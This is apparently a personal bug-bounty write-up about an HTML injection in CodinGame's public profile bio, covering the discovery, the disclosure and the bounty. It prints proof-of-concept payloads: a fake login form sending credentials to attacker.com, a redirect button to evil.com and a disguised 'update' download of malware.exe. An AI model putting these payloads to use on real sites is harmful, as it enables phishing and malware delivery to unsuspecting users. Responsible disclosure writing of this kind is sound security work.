rabbyt3s
Index
  • bug-bounty
  • web-security
  • html-injection

How I got on CodinGame's Hall of Fame with an HTML injection

First paid bounty: HTML in a profile bio that turned into a phishing surface on a real domain.

···

April 2026 log. The actual back and forth with the program was in September 2024.

Context

We had some CodinGame exercises to do for class. I wasn't really into it, so I spent the time clicking through my account settings instead of actually solving the puzzles.

CodinGame homepage

CodinGame is a pretty big platform (millions of devs, companies use it for hiring), so even a "dumb" bug can have a lot of reach. I wasn't even looking for anything specific, just messing around with my profile.

The find

I noticed the "About me" box on the profile page. I tried putting a basic HTML tag in there, saved it, and when I reloaded the page, the browser just rendered it. No filtering, no escaping.

Still screenshot: About me field with payload

Why it mattered

A heading tag is just a visual mess, but once you can inject arbitrary HTML, you can do things like building a fake login form that looks like it belongs to the site.

<h1>Confirm Login to see content</h1>
<img src="https://media.glassdoor.com/sqll/1149702/codingame-squareLogo-1675265034218.png"
     alt="Logo" style="width:200px;height:auto;">
<form method="POST" action="https://attacker.com/collect.php">
    Username: <input type="text" name="username" /><br/>
    Password: <input type="password" name="passwd" /><br/>
    <input type="submit" value="Login" />
</form>

Since it's on codingame.com, you get the real SSL certificate and the trusted domain in the address bar.

Still screenshot: fake login on public profile

The real issue was that profiles are public. You don't need to be logged in to see them. You could just send a link to someone, they'd see a login prompt on the official site, and they'd probably just type their credentials without thinking twice.

Other payloads

I included a few other things in the report to show what else was possible:

Styled redirect buttons:

<a href="https://evil.com"
   style="display:inline-block;padding:10px 20px;
          background-color:#007bff;color:white;
          text-decoration:none;border-radius:5px;">
  Go to CodinGame
</a>

File downloads (using the download attribute to make a binary look like an official update):

<a href="https://attacker.com/malware.exe"
   download="CodinGame_Update.exe"
   style="display:inline-block;padding:10px 20px;
          background-color:#007bff;color:white;
          text-decoration:none;border-radius:5px;">
  Download CodinGame Application
</a>

Disclosure

I sent the report on September 9, 2024. I had to explain why this was more than just a "customizable field" issue (which is usually out of scope). I argued that being able to harvest credentials or push downloads on unauthenticated users was a different level of risk.

The response

They actually took it seriously after some internal debate:

"It's been a long debate with devs. Despite being out of scope we found that we may want to add some level of protection: 'I guess we could remove input tags at least.' As such I can provide a reward."

Got the bounty on September 27 and my name on the Hall of Fame on October 1.

Celebration GIF

Hall of Fame entry on CodinGame's vulnerability disclosure page

Reward

Closing

I think the report worked because I didn't just say "there is HTML injection." I showed how it could be used for phishing and downloads. Usually you should stick to the scope, but if you find something that actually puts people at risk, it's worth explaining it clearly and seeing what they say.

Also, I got my first bounty because I was procrastinating on my homework. Not a bad trade.

Bye